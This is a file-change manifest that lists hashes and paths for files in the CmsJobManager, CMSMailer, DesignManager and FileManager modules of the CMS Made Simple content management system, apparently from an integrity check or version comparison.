CHANGED :: 46e4c61e30e491b97d7a728c837cc37b :: \modules\CmsJobManager\lang\ext\it_IT.php
CHANGED :: 53436b86e9ed79e76bedfa8c91a18173 :: \modules\CmsJobManager\lang\ext\nb_NO.php
CHANGED :: 93307f0a5b1ed81ba54a38676454aded :: \modules\CmsJobManager\lang\ext\nl_NL.php
CHANGED :: a2dfceebb7e207ab69d4769ac247abea :: \modules\CmsJobManager\lang\ext\ru_RU.php
CHANGED :: 415a97df902d6b2eba86c0cceef0d4e1 :: \modules\CmsJobManager\lang\ext\sv_SE.php
CHANGED :: f62ffa0ce22511c0a4e4b988174edd92 :: \modules\CmsJobManager\lang\ext\uk_UA.php
CHANGED :: 0af5028cd69d65e2c26fe66cb115a070 :: \modules\CmsJobManager\lib\class.JobQueue.php
CHANGED :: 9e6838833f8f14dbc96e25f96ba09a37 :: \modules\CmsJobManager\lib\class.Test1Cron.php
CHANGED :: 89c85777d2a401a336a257168caa0ebf :: \modules\CmsJobManager\lib\class.Test1Job.php
CHANGED :: 22400d78ba9f9db7a476dcc917c5695d :: \modules\CmsJobManager\lib\class.utils.php
CHANGED :: 634fc746f160152372533a91e5a8704f :: \modules\CmsJobManager\method.install.php
CHANGED :: fe3c29514439e7a509e515062df635e3 :: \modules\CmsJobManager\method.uninstall.php
CHANGED :: 7ad18f058a95b154a242c6d9b44c6e73 :: \modules\CmsJobManager\templates\defaultadmin.tpl
CHANGED :: 045e3dae4935e81bf6e921f128be55bb :: \modules\CMSMailer\changelog.inc
CHANGED :: 1bd5a08285ab0dc7633c072347fc9bcf :: \modules\CMSMailer\CMSMailer.module.php
CHANGED :: 6c1b61562cadc4fc4d3b1dcc180e2dfe :: \modules\CMSMailer\images\icon.gif
CHANGED :: de30a1e9b13d3930e9cecf487d1f8662 :: \modules\CMSMailer\lang\en_US.php
CHANGED :: 35d693b3fbf90c3ac0d6cf017938d574 :: \modules\CMSMailer\lang\ext\ar_AR.php
CHANGED :: 40c1ec338992dd59e2d164718520e367 :: \modules\CMSMailer\lang\ext\ca_ES.php
CHANGED :: f4427e13e7af639db7fc6dc078f33c09 :: \modules\CMSMailer\lang\ext\cs_CZ.php
CHANGED :: 3cf51353b22ad07063b0f39b740e0576 :: \modules\CMSMailer\lang\ext\da_DK.php
CHANGED :: b61ea15e890c65afd0ddb20578486680 :: \modules\CMSMailer\lang\ext\de_DE.php
CHANGED :: 44224f2bba9380ee54ee2d28e849d557 :: \modules\CMSMailer\lang\ext\el_GR.php
CHANGED :: 363514d379e4fef1087a8885a9e9e1c4 :: \modules\CMSMailer\lang\ext\en_CY.php
CHANGED :: 10d120d11446a2b34975506912ce8e11 :: \modules\CMSMailer\lang\ext\es_ES.php
CHANGED :: 7006329b80cb740eccc0dcb516077ecb :: \modules\CMSMailer\lang\ext\et_EE.php
CHANGED :: 0e00166cd936e482600a8f0b611181b0 :: \modules\CMSMailer\lang\ext\fa_FA.php
CHANGED :: 0e00166cd936e482600a8f0b611181b0 :: \modules\CMSMailer\lang\ext\fa_IR.php
CHANGED :: 0f3d9ebccbad344a7920a3fcc924ec95 :: \modules\CMSMailer\lang\ext\fi_FI.php
CHANGED :: 4e3b40dd88400203d6f62c9d78b4f422 :: \modules\CMSMailer\lang\ext\fr_FR.php
CHANGED :: 2299e820f01a9e030de552c6aafd06b1 :: \modules\CMSMailer\lang\ext\hr_HR.php
CHANGED :: 972e5c4a63a2d640d33fe4cc5218fb9c :: \modules\CMSMailer\lang\ext\hu_HU.php
CHANGED :: fd7ae96b474a9fcd4977710876b200cc :: \modules\CMSMailer\lang\ext\id_ID.php
CHANGED :: 0d422eba9293156f5b179ede8861f422 :: \modules\CMSMailer\lang\ext\it_IT.php
CHANGED :: bc681a824c05b9838a13fd757b30bb70 :: \modules\CMSMailer\lang\ext\iw_IL.php
CHANGED :: 5988dda0a28677bcdff49cbdc591f04b :: \modules\CMSMailer\lang\ext\ja_JP.php
CHANGED :: b76706a1de1ea3ad8deb2041c3cc4326 :: \modules\CMSMailer\lang\ext\lt_LT.php
CHANGED :: bb65fe76c3b9dd4aebfd99f27db1dfa5 :: \modules\CMSMailer\lang\ext\nb_NO.php
CHANGED :: 623dc08789dcb1c5ad5b357f4bf0e97b :: \modules\CMSMailer\lang\ext\nl_NL.php
CHANGED :: ae5907f320b0046afac9af1dfcfc6017 :: \modules\CMSMailer\lang\ext\pl_PL.php
CHANGED :: 4f1fb4663fa5a140a677912cdb8fb465 :: \modules\CMSMailer\lang\ext\pt_BR.php
CHANGED :: b712cff187c2d6f4b836208352a423ba :: \modules\CMSMailer\lang\ext\pt_PT.php
CHANGED :: 65e46c2fd0c1e13a5b4674a24fd877e9 :: \modules\CMSMailer\lang\ext\ro_RO.php
CHANGED :: f380d84a83be76c73f9d44fde4359c4b :: \modules\CMSMailer\lang\ext\ru_RU.php
CHANGED :: 031fb8c9923dc7e32efcec19d09db462 :: \modules\CMSMailer\lang\ext\sk_SK.php
CHANGED :: 285ebed7454ed1349fc45fcbe4d5aec3 :: \modules\CMSMailer\lang\ext\sl_SI.php
CHANGED :: e33ceb4f6d5af1146662b64b4fe514ba :: \modules\CMSMailer\lang\ext\sr_YU.php
CHANGED :: 53bd53495c2a410daf95b32d45345424 :: \modules\CMSMailer\lang\ext\sv_SE.php
CHANGED :: 4e9ea4953340383035ce7c10365d9570 :: \modules\CMSMailer\lang\ext\tr_TR.php
CHANGED :: d46354812db6a1c2504a2ddfedbd84e4 :: \modules\CMSMailer\lang\ext\uk_UA.php
CHANGED :: be790a765a9e890a9a84e5d8e9d81c35 :: \modules\CMSMailer\lang\ext\zh_TW.php
CHANGED :: e0daeb15c0a6f34acb3e48d06c97a25e :: \modules\CMSMailer\templates\error.tpl
CHANGED :: 3b2a2a02ea5087b87991e75e225e6187 :: \modules\CMSMailer\templates\prefs.tpl
CHANGED :: be4c4c659987f1f0d4d11307b1ee2fb9 :: \modules\DesignManager\action.admin_bulk_css.php
CHANGED :: 00c49f1517e75f80070f2041a044a864 :: \modules\DesignManager\action.admin_bulk_template.php
CHANGED :: 4b9c36a32780abcbb5e0728364556bd9 :: \modules\DesignManager\action.admin_clearlocks.php
CHANGED :: 8d1e54817b6a0c9c4e163ff9d1a36562 :: \modules\DesignManager\action.admin_copy_css.php
CHANGED :: 1e7de0c68cf887ed56aa1cf075788d80 :: \modules\DesignManager\action.admin_copy_template.php
CHANGED :: 67f287c0acaab8d1dd5d125bde4fd173 :: \modules\DesignManager\action.admin_delete_category.php
CHANGED :: bc4ce578e4d7563156aeec2ce21751ec :: \modules\DesignManager\action.admin_delete_css.php
CHANGED :: 2311e5cf9b78d73ee99674f90c9ddfd4 :: \modules\DesignManager\action.admin_delete_design.php
CHANGED :: 5a8d087b8449a23e588a04e01c7d3ab4 :: \modules\DesignManager\action.admin_delete_template.php
CHANGED :: 669849682dafecf964110e87e62fb256 :: \modules\DesignManager\action.admin_edit_category.php
CHANGED :: 0a0e77ce9afadf2c00e22f58243131aa :: \modules\DesignManager\action.admin_edit_css.php
CHANGED :: b2ad9f68596df89e1362a1c962d4e717 :: \modules\DesignManager\action.admin_edit_design.php
CHANGED :: f2d6600a1d4c2d4b1fc1d85e0c4c14de :: \modules\DesignManager\action.admin_edit_template.php
CHANGED :: 8fa266c65bbe26b282e13dda327e9a19 :: \modules\DesignManager\action.admin_edit_type.php
CHANGED :: da5d73e8f7ce309b402dd347e5172cff :: \modules\DesignManager\action.admin_export_design.php
CHANGED :: 3ce1206cfbbba903948cf1033d154d0f :: \modules\DesignManager\action.admin_import_design.php
CHANGED :: 3ab7460e6c463c8a5a384bb20928777e :: \modules\DesignManager\action.admin_reset_type.php
CHANGED :: cf997507e92a83b47130008e127fd4de :: \modules\DesignManager\action.admin_settings.php
CHANGED :: 37cdbf4585cf9cc4072f99761772c364 :: \modules\DesignManager\action.ajax_get_stylesheets.php
CHANGED :: f6754fbe2bdbc3c12e99d2c4e2ff5fbf :: \modules\DesignManager\action.ajax_get_templates.php
CHANGED :: bc279d3beec34d12a98cccd2e5b7f7f2 :: \modules\DesignManager\action.ajax_order_cats.php
CHANGED :: 29bcb6be219814ea09d16a9ded782a20 :: \modules\DesignManager\action.defaultadmin.php
CHANGED :: 00da815bc1244e0eeba01372f82d1627 :: \modules\DesignManager\changelog.inc
CHANGED :: a5195e7d3baff7fad58b5e2bd6f7ce4a :: \modules\DesignManager\DesignManager.module.php
CHANGED :: 7194d60abb1b20600557574ac9c1d8bd :: \modules\DesignManager\icons\down.gif
CHANGED :: 82e3cc641e50a1c0e5f3c6efdc5f5667 :: \modules\DesignManager\icons\left.gif
CHANGED :: 8c3898e1f5faeed0ec7021bdf38a2f11 :: \modules\DesignManager\icons\right.gif
CHANGED :: 82da2ad0214b5202d95636a480fe1a33 :: \modules\DesignManager\icons\up.gif
CHANGED :: 678ee8009ec6c59fbec098cc716b3c37 :: \modules\DesignManager\images\icon.gif
CHANGED :: 7151b3e216c3dfa71e19714d4a2a0d75 :: \modules\DesignManager\images\icon.png
CHANGED :: 724358f9b10c77ce481052bbd31826a3 :: \modules\DesignManager\lang\en_US.php
CHANGED :: 2794209d3c7c4930ca167078fe483a7f :: \modules\DesignManager\lang\ext\cs_CZ.php
CHANGED :: 99e2fe0d2e2c144629bb002690a23254 :: \modules\DesignManager\lang\ext\da_DK.php
CHANGED :: c1e75e8a8173d6c8d1ce4e9c5e109bd2 :: \modules\DesignManager\lang\ext\de_DE.php
CHANGED :: 318b518c2a4ab7e0455ed34e6df10376 :: \modules\DesignManager\lang\ext\fr_FR.php
CHANGED :: 190089801383bc5de93650cf2a003d4f :: \modules\DesignManager\lang\ext\it_IT.php
CHANGED :: fd126a3dbad37f695c18f085c85b16f5 :: \modules\DesignManager\lang\ext\nb_NO.php
CHANGED :: 17e5c7e7a27d776c3d8c14e8af91c1f0 :: \modules\DesignManager\lang\ext\nl_NL.php
CHANGED :: a822dd9c4aa6b3c979c57629d6aadfd7 :: \modules\DesignManager\lang\ext\ru_RU.php
CHANGED :: 2bb950fdf8eeec03c2305aee2c11d86b :: \modules\DesignManager\lang\ext\tr_TR.php
CHANGED :: ac32528a974d9154e8543bc5475ea047 :: \modules\DesignManager\lang\ext\uk_UA.php
CHANGED :: d716c59031398f3cf1dcf47c083c5b86 :: \modules\DesignManager\lang\ext\zh_TW.php
CHANGED :: b55549cca306c3802680714a5d9f6738 :: \modules\DesignManager\lib\class.dm_design_exporter.php
CHANGED :: 16a29c60d965a94cbc000aa66e53f094 :: \modules\DesignManager\lib\class.dm_design_reader.php
CHANGED :: 4339281ca0bdcca37d008fd58bfd56f4 :: \modules\DesignManager\lib\class.dm_reader_base.php
CHANGED :: f2cd97a605a882fd89087c32b1131690 :: \modules\DesignManager\lib\class.dm_reader_factory.php
CHANGED :: 4b36dbfa84b03a83e6ca8b637c4288f8 :: \modules\DesignManager\lib\class.dm_theme_reader.php
CHANGED :: b4f13d5caa51ec87e1073ad0e3ed54c2 :: \modules\DesignManager\lib\class.dm_utils.php
CHANGED :: d70aed531cf3bc1c3a57a06d63a55557 :: \modules\DesignManager\lib\class.dm_xml_reader.php
CHANGED :: 34ea00b175b6517707019a1256528e4b :: \modules\DesignManager\method.install.php
CHANGED :: e977b5b6e38299771037f3b1f3457054 :: \modules\DesignManager\method.uninstall.php
CHANGED :: 40d17538cc429cb409368f4007986093 :: \modules\DesignManager\templates\admin_bulk_css.tpl
CHANGED :: b9492c65939a135949650447a11321cc :: \modules\DesignManager\templates\admin_bulk_template.tpl
CHANGED :: 32c430a0f03d951ba94dd40f458a7382 :: \modules\DesignManager\templates\admin_copy_css.tpl
CHANGED :: 404187057d3abc4fa45766032a053bb2 :: \modules\DesignManager\templates\admin_copy_template.tpl
CHANGED :: f479f23b393778f06aa35d0ad1987e56 :: \modules\DesignManager\templates\admin_defaultadmin_categories.tpl
CHANGED :: aaebc1ee83b5a0604b6a09c95163e09b :: \modules\DesignManager\templates\admin_defaultadmin_csstooltip.tpl
CHANGED :: bcdb7b2ba7e38ffd3e168debc36c1074 :: \modules\DesignManager\templates\admin_defaultadmin_designs.tpl
CHANGED :: 1de3b6e4308f9ec156accc51c7308d37 :: \modules\DesignManager\templates\admin_defaultadmin_stylesheets.tpl
CHANGED :: 2ba10f3be90997f47f0aa8bc1b717a8e :: \modules\DesignManager\templates\admin_defaultadmin_templates.tpl
CHANGED :: b03422c34e13e5d696df33c4c1a28a46 :: \modules\DesignManager\templates\admin_defaultadmin_tpltooltip.tpl
CHANGED :: 672bce691118aaf8fabda7739e79a0c4 :: \modules\DesignManager\templates\admin_defaultadmin_tpltype_tooltip.tpl
CHANGED :: 104546a5ce2b24d0ca2032a56a4b1ae5 :: \modules\DesignManager\templates\admin_defaultadmin_types.tpl
CHANGED :: 96317bb3ec9bacd9c6fc5bec63d12538 :: \modules\DesignManager\templates\admin_delete_css.tpl
CHANGED :: 776b6f1db5c7ae323a2495dbe0a48077 :: \modules\DesignManager\templates\admin_delete_design.tpl
CHANGED :: 29292a48684bd6e2373f4d7d9ce0037e :: \modules\DesignManager\templates\admin_delete_template.tpl
CHANGED :: 3553606f5e93525352c4f1e004040e9e :: \modules\DesignManager\templates\admin_edit_category.tpl
CHANGED :: 220fba74038147ced703c43e3d449ddd :: \modules\DesignManager\templates\admin_edit_css.tpl
CHANGED :: 647665e2745e121d22ab42db2d881afa :: \modules\DesignManager\templates\admin_edit_design.tpl
CHANGED :: 97b6aeb1b4d53266008817c999dee995 :: \modules\DesignManager\templates\admin_edit_design_stylesheets.tpl
CHANGED :: 3eb814ab7cbbce2f74c1d583058bff4a :: \modules\DesignManager\templates\admin_edit_design_templates.tpl
CHANGED :: 5af585d8b272871b1815fd9474785a30 :: \modules\DesignManager\templates\admin_edit_template.tpl
CHANGED :: b76a4af1dd6ec4a23a505334277d5d7b :: \modules\DesignManager\templates\admin_edit_type.tpl
CHANGED :: 454589d38f69195410440ad02346045d :: \modules\DesignManager\templates\admin_import_design.tpl
CHANGED :: d9721f224398b4276719f215da164d01 :: \modules\DesignManager\templates\admin_import_design2.tpl
CHANGED :: 22eb030b51dce55ed65e29e10b11db0e :: \modules\DesignManager\templates\admin_settings.tpl
CHANGED :: 2f566124b6d3bc9a3acb712056dd518a :: \modules\DesignManager\templates\admin_set_all_pages.tpl
CHANGED :: c47acc5e199613700d68900bbd4e0892 :: \modules\DesignManager\templates\ajax_get_stylesheets.tpl
CHANGED :: 916b4c332f0967bcf79b8025d744a2cf :: \modules\DesignManager\templates\ajax_get_templates.tpl
CHANGED :: 4b141d0fee4f016a017ce16a4ebe2e14 :: \modules\DesignManager\templates\defaultadmin.tpl
CHANGED :: d0e30807e1053b8295d05efcb41d1d6e :: \modules\FileManager\.htaccess
CHANGED :: 5edeec585e57bb71bf619f185dc1bba3 :: \modules\FileManager\action.admin_fileview.php
CHANGED :: b950dd0bc0476c4ea49e290f6b883aee :: \modules\FileManager\action.admin_settings.php
CHANGED :: 32640c2dfd85562f3e922e0c97ab75f7 :: \modules\FileManager\action.changedir.php
CHANGED :: 41e4689aca69452b67cd7b1690a4cb96 :: \modules\FileManager\action.chmoddir.php
CHANGED :: 632cf0e30e406cfdde4624c8ca18cf61 :: \modules\FileManager\action.chmodfile.php
CHANGED :: 118e09089c50f0744a13bad3f434c7af :: \modules\FileManager\action.chmodfilewin.php
CHANGED :: 1115efc33a5682f632e6cd70efbfd931 :: \modules\FileManager\action.copy.php
CHANGED :: 6c9990990b3a171d5d9ddb780196221c :: \modules\FileManager\action.defaultadmin.php
CHANGED :: 2cd3e7406dccd0957feb81f14cfeee5d :: \modules\FileManager\action.delete.php
CHANGED :: 5856fbb77cf673b048f6761353e84d14 :: \modules\FileManager\action.dropzone.php
CHANGED :: 38ac110867d2857252692df4e75498b4 :: \modules\FileManager\action.fileaction.php
CHANGED :: 05facb91f9ad3d1084789120051bcbeb :: \modules\FileManager\action.javascript.php
CHANGED :: 251636cdb4e106ebef348dcb98fd3c2c :: \modules\FileManager\action.move.php
CHANGED :: 222707365a34d8502d1166df422c51c2 :: \modules\FileManager\action.newdir.php
CHANGED :: 8c2e343f34b7bb8b61b766a88c1db11c :: \modules\FileManager\action.rename.php
CHANGED :: 359c5f1f6ae03f5fb84e6cbfd1f4213f :: \modules\FileManager\action.resizecrop.php
CHANGED :: d9263e8baf869790cf5270fd27a6d281 :: \modules\FileManager\action.rotate.php
CHANGED :: f0d7a0f6291acc4ea97e3534cb6c6e58 :: \modules\FileManager\action.savesettings.php
CHANGED :: 3056bc4c732feb56cba9123974b48164 :: \modules\FileManager\action.thumb.php
CHANGED :: 8da2ee1de88933048c00f670a11479b6 :: \modules\FileManager\action.unpack.php
CHANGED :: 2f3a93ef7d52ea7cd7c9dca720ab5335 :: \modules\FileManager\action.upload.php
CHANGED :: c6f7789952be90693ab767ab41c8e757 :: \modules\FileManager\action.view.php
CHANGED :: 76ffe01d5e53072b376d140c1a128846 :: \modules\FileManager\dunzip.php
CHANGED :: 89e1cc7a049f1c0f26178fd0ac14d00d :: \modules\FileManager\easyarchives\EasyArchive.class.php
CHANGED :: bce88efadf02463e3a470d0c40f065ea :: \modules\FileManager\easyarchives\EasyBzip2.class.php
CHANGED :: 6e08434b6a6e3cdb9cd031c602efa916 :: \modules\FileManager\easyarchives\EasyGzip.class.php
CHANGED :: 36d880f34fcab8c0fc0ff5a1a44d72bb :: \modules\FileManager\easyarchives\EasyTar.class.php
CHANGED :: 65cce2894e22141d126504d761e7b7e9 :: \modules\FileManager\easyarchives\EasyZip.class.php
CHANGED :: bb071bac4d81ac307e170d62ec9e7ae1 :: \modules\FileManager\fileinfo.php
CHANGED :: 0986753b5a54f7af11090c6ccb646539 :: \modules\FileManager\FileManager.module.php
CHANGED :: c818af7320a7b51349a9ccfcaa518047 :: \modules\FileManager\filepicker.css
CHANGED :: f5476a1364289ed348173fe7d301c1c3 :: \modules\FileManager\icons\themes\default\actions\chmod.gif
CHANGED :: d84089a58726fa56cc625ea687a4fd1c :: \modules\FileManager\icons\themes\default\actions\delete.gif
CHANGED :: 2598d51b0d5b296f637ea01ec924000b :: \modules\FileManager\icons\themes\default\actions\dir_up.gif
CHANGED :: 182bc4ffedff5b6092bd6a8c05cf30d4 :: \modules\FileManager\icons\themes\default\actions\padlock.gif
CHANGED :: 2a2360061768f782d39851a03a65b848 :: \modules\FileManager\icons\themes\default\actions\rename.gif
CHANGED :: be2466e396c34e1cac62f12caec95b4b :: \modules\FileManager\icons\themes\default\extensions\16px\0.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\16px\ace.png
CHANGED :: 9b8860dd3d19c5ccec8989cb0981d7f1 :: \modules\FileManager\icons\themes\default\extensions\16px\ai.png
CHANGED :: 7a8f25c0e025f2d81e9a76b6b2909219 :: \modules\FileManager\icons\themes\default\extensions\16px\aif.png
CHANGED :: 45122b3b46debde889449900fc490a83 :: \modules\FileManager\icons\themes\default\extensions\16px\ani.png
CHANGED :: d53f8d14dde2fc9ec4148d273b7ddfd9 :: \modules\FileManager\icons\themes\default\extensions\16px\asf.png
CHANGED :: ac44a82e401acd3dbcf4ff8dc3595af1 :: \modules\FileManager\icons\themes\default\extensions\16px\asp.png
CHANGED :: 28ca8ad824f9c3505cc57c9266acfb37 :: \modules\FileManager\icons\themes\default\extensions\16px\avi.png
CHANGED :: f3e3e3569fe26a864ea06f9749087ef9 :: \modules\FileManager\icons\themes\default\extensions\16px\bak.png
CHANGED :: ddf7a39083facc40eba2a1809a4fce13 :: \modules\FileManager\icons\themes\default\extensions\16px\bat.png
CHANGED :: 6d5edd9cc46f04200ca1726b99272f51 :: \modules\FileManager\icons\themes\default\extensions\16px\bin.png
CHANGED :: 5271b840024d6cf2b05ab8207055e79f :: \modules\FileManager\icons\themes\default\extensions\16px\bmp.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\16px\bz.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\16px\bz2.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\16px\cab.png
CHANGED :: 1611892148a92627e4de1c078e54b1c5 :: \modules\FileManager\icons\themes\default\extensions\16px\cdr.png
CHANGED :: b982a4071ce27065b73123e10e814a9e :: \modules\FileManager\icons\themes\default\extensions\16px\cfg.png
CHANGED :: ddf7a39083facc40eba2a1809a4fce13 :: \modules\FileManager\icons\themes\default\extensions\16px\com.png
CHANGED :: f8cdd40893244c62190009a50d3eacc5 :: \modules\FileManager\icons\themes\default\extensions\16px\conf.png
CHANGED :: e63b8632ba47f55769484cf5ff007fbd :: \modules\FileManager\icons\themes\default\extensions\16px\cpt.png
CHANGED :: 9af6a6e5cdaca877bb7d02c063067686 :: \modules\FileManager\icons\themes\default\extensions\16px\css.png
CHANGED :: 45122b3b46debde889449900fc490a83 :: \modules\FileManager\icons\themes\default\extensions\16px\cur.png
CHANGED :: b4e304d75e08d7425e3b8d70b29372e4 :: \modules\FileManager\icons\themes\default\extensions\16px\dat.png
CHANGED :: 786d17dd6ed575642ef81aaeff1b4ec2 :: \modules\FileManager\icons\themes\default\extensions\16px\db.png
CHANGED :: f3c9b07e3f03c4bccee9e8fcbf365fa0 :: \modules\FileManager\icons\themes\default\extensions\16px\dcr.png
CHANGED :: 262c5478fbe3767179eb7389c6fd9fca :: \modules\FileManager\icons\themes\default\extensions\16px\dic.png
CHANGED :: 21aa9271d7cd305dd7baa2d6bac778f6 :: \modules\FileManager\icons\themes\default\extensions\16px\diff.png
CHANGED :: 844905a7d4073181589a0d0bbe66b092 :: \modules\FileManager\icons\themes\default\extensions\16px\dir.png
CHANGED :: 682aa9017b56b952f1bed3ebff88f24e :: \modules\FileManager\icons\themes\default\extensions\16px\dll.png
CHANGED :: 8cffe4a25678ee60f9576189bef142ab :: \modules\FileManager\icons\themes\default\extensions\16px\dmg.png
CHANGED :: f892f863743b7a0b19e684025f6972a4 :: \modules\FileManager\icons\themes\default\extensions\16px\doc.png
CHANGED :: f892f863743b7a0b19e684025f6972a4 :: \modules\FileManager\icons\themes\default\extensions\16px\docx.png
CHANGED :: dcc0006c47dd88c369dce903c8914cfc :: \modules\FileManager\icons\themes\default\extensions\16px\dwg.png
CHANGED :: d3f20b53bbe8506ad62d42988734888d :: \modules\FileManager\icons\themes\default\extensions\16px\edir.png
CHANGED :: 4a5d6550e2104d962c812c2a08ec60ab :: \modules\FileManager\icons\themes\default\extensions\16px\eml.png
CHANGED :: 6bc231629cf3fa087ff00bf10d277aee :: \modules\FileManager\icons\themes\default\extensions\16px\eps.png
CHANGED :: d14bb99058193d903496f1c79e3bd305 :: \modules\FileManager\icons\themes\default\extensions\16px\exe.png
CHANGED :: e52c87257b33699149751b94d9f1f69e :: \modules\FileManager\icons\themes\default\extensions\16px\fla.png
CHANGED :: 0d6126a05f8c7742d264f9cc28f087df :: \modules\FileManager\icons\themes\default\extensions\16px\fon.png
CHANGED :: abb23cb955761ae7088e51a4e67a7a26 :: \modules\FileManager\icons\themes\default\extensions\16px\gif.png
CHANGED :: fc6a711c459788548ccaea02f631d472 :: \modules\FileManager\icons\themes\default\extensions\16px\gz.png
CHANGED :: bb6b49d84534a45b9017b40978e9a2b5 :: \modules\FileManager\icons\themes\default\extensions\16px\hqx.png
CHANGED :: 1d3d80ba1d2333543258b44ee1cd529f :: \modules\FileManager\icons\themes\default\extensions\16px\htm.png
CHANGED :: 1d3d80ba1d2333543258b44ee1cd529f :: \modules\FileManager\icons\themes\default\extensions\16px\html.png
CHANGED :: ef09a12e883549dcd0797f030dc4d811 :: \modules\FileManager\icons\themes\default\extensions\16px\ico.png
CHANGED :: 9b668773ce4f6f87d37843a837d4f5dd :: \modules\FileManager\icons\themes\default\extensions\16px\inc.png
CHANGED :: 2481bea55d5f8a544b0d3bc75e0fe019 :: \modules\FileManager\icons\themes\default\extensions\16px\ini.png
CHANGED :: 21f7ed7e570fad75420d2b482a6e61ee :: \modules\FileManager\icons\themes\default\extensions\16px\iso.png
CHANGED :: 2e49a8e00c8fb5179456c91bd7f33c2b :: \modules\FileManager\icons\themes\default\extensions\16px\jpeg.png
CHANGED :: 2e49a8e00c8fb5179456c91bd7f33c2b :: \modules\FileManager\icons\themes\default\extensions\16px\jpg.png
CHANGED :: 6dfb606e5cd7f8a4e8f37c3de0dfbe24 :: \modules\FileManager\icons\themes\default\extensions\16px\js.png
CHANGED :: f75a27a05c4214bc007ca0371288d36b :: \modules\FileManager\icons\themes\default\extensions\16px\log.png
CHANGED :: a358a26cb1d44da190d2f0d944dc26fc :: \modules\FileManager\icons\themes\default\extensions\16px\m3u.png
CHANGED :: 4398c5642803dcc81bc468c49ee3870e :: \modules\FileManager\icons\themes\default\extensions\16px\mdb.png
CHANGED :: 562ade1efa9efdcc362144771797b0ec :: \modules\FileManager\icons\themes\default\extensions\16px\mid.png
CHANGED :: 562ade1efa9efdcc362144771797b0ec :: \modules\FileManager\icons\themes\default\extensions\16px\midi.png
CHANGED :: a5041425aa02410c2f5fb2daf3c535d2 :: \modules\FileManager\icons\themes\default\extensions\16px\mov.png
CHANGED :: a358a26cb1d44da190d2f0d944dc26fc :: \modules\FileManager\icons\themes\default\extensions\16px\mp3.png
CHANGED :: 7de0ce3dc45fb518051f6c17ea320d0a :: \modules\FileManager\icons\themes\default\extensions\16px\mpeg.png
CHANGED :: 7de0ce3dc45fb518051f6c17ea320d0a :: \modules\FileManager\icons\themes\default\extensions\16px\mpg.png
CHANGED :: 2a159d3ecd4832a136cf0b5b300192f8 :: \modules\FileManager\icons\themes\default\extensions\16px\nfo.png
CHANGED :: b222cfba97fc8f2aa244d5d6f1b741af :: \modules\FileManager\icons\themes\default\extensions\16px\odb.png
CHANGED :: 5fb9375b9e42efd1460f472ea3e25117 :: \modules\FileManager\icons\themes\default\extensions\16px\odc.png
CHANGED :: 28db25b25ba4afe4e3132885ddc1ab22 :: \modules\FileManager\icons\themes\default\extensions\16px\odf.png
CHANGED :: 61bdbf387262ec7d1a98ba0e864a5cbf :: \modules\FileManager\icons\themes\default\extensions\16px\odg.png
CHANGED :: bc9d2aab4445b41651f409aa2ebf433b :: \modules\FileManager\icons\themes\default\extensions\16px\odm.png
CHANGED :: 8a81b2fa9cc59abb4ebcd0cdde5be79f :: \modules\FileManager\icons\themes\default\extensions\16px\odp.png
CHANGED :: 1699d148860680f2680fbca930d2882d :: \modules\FileManager\icons\themes\default\extensions\16px\ods.png
CHANGED :: 7276b2410b996ba5ff6dac58414b2ab4 :: \modules\FileManager\icons\themes\default\extensions\16px\odt.png
CHANGED :: c33a79e76e3c6e0dd11c158a332337d8 :: \modules\FileManager\icons\themes\default\extensions\16px\ogg.png
CHANGED :: cd6d2fbe6350fd472cb3c245d90e5f67 :: \modules\FileManager\icons\themes\default\extensions\16px\otg.png
CHANGED :: 9f68cdc6aabb2b13af05596160010312 :: \modules\FileManager\icons\themes\default\extensions\16px\oth.png
CHANGED :: 05f53942bc2ef058abaf24ce2603efa3 :: \modules\FileManager\icons\themes\default\extensions\16px\otp.png
CHANGED :: 550fbcd6407826c5a71f0f52b060d35f :: \modules\FileManager\icons\themes\default\extensions\16px\ots.png
CHANGED :: 1659b84849b477bec8cfe70e7c4435f7 :: \modules\FileManager\icons\themes\default\extensions\16px\ott.png
CHANGED :: a5b0f19db302e724916d405de05f48a3 :: \modules\FileManager\icons\themes\default\extensions\16px\patch.png
CHANGED :: 32145081819a185ba662cce528130657 :: \modules\FileManager\icons\themes\default\extensions\16px\pdf.png
CHANGED :: c5f1fb47249a90649fe3583d16e7c8ad :: \modules\FileManager\icons\themes\default\extensions\16px\php.png
CHANGED :: d756992af6d90ee892938a7909fea6a3 :: \modules\FileManager\icons\themes\default\extensions\16px\php3.png
CHANGED :: c5f1fb47249a90649fe3583d16e7c8ad :: \modules\FileManager\icons\themes\default\extensions\16px\phtml.png
CHANGED :: 99c215b200a0f9abc9e5a841345fd7c4 :: \modules\FileManager\icons\themes\default\extensions\16px\pl.png
CHANGED :: 43b266dbb99fce6f7110cf97a847a8f8 :: \modules\FileManager\icons\themes\default\extensions\16px\png.png
CHANGED :: e583e977d26e73bc8fcafa3e921a7c8f :: \modules\FileManager\icons\themes\default\extensions\16px\pps.png
CHANGED :: 18ce9548f6fc3bc16812f59b05450921 :: \modules\FileManager\icons\themes\default\extensions\16px\ppt.png
CHANGED :: 152ad09bf09c1f615b26f1d1914d1f75 :: \modules\FileManager\icons\themes\default\extensions\16px\psd.png
CHANGED :: 7f98c9d6156a7c2c0fd7450ac9596d55 :: \modules\FileManager\icons\themes\default\extensions\16px\pwl.png
CHANGED :: a5041425aa02410c2f5fb2daf3c535d2 :: \modules\FileManager\icons\themes\default\extensions\16px\qt.png
CHANGED :: b7cb9f8247e1dd13518441ec7a2a2bed :: \modules\FileManager\icons\themes\default\extensions\16px\ra.png
CHANGED :: b7cb9f8247e1dd13518441ec7a2a2bed :: \modules\FileManager\icons\themes\default\extensions\16px\ram.png
CHANGED :: 92ba24735f75cd165cebe00ef42ea0ba :: \modules\FileManager\icons\themes\default\extensions\16px\rar.png
CHANGED :: d95f282ea8d20427919653c7c364f6bd :: \modules\FileManager\icons\themes\default\extensions\16px\reg.png
CHANGED :: d78d38498903c8bd17a356dfd79c50db :: \modules\FileManager\icons\themes\default\extensions\16px\rpm.png
CHANGED :: 4bdb0feb99fd618c0bb3b0c9ffe001d4 :: \modules\FileManager\icons\themes\default\extensions\16px\rtf.png
CHANGED :: 058361a637258394244c58bc87cf71ea :: \modules\FileManager\icons\themes\default\extensions\16px\sh.png
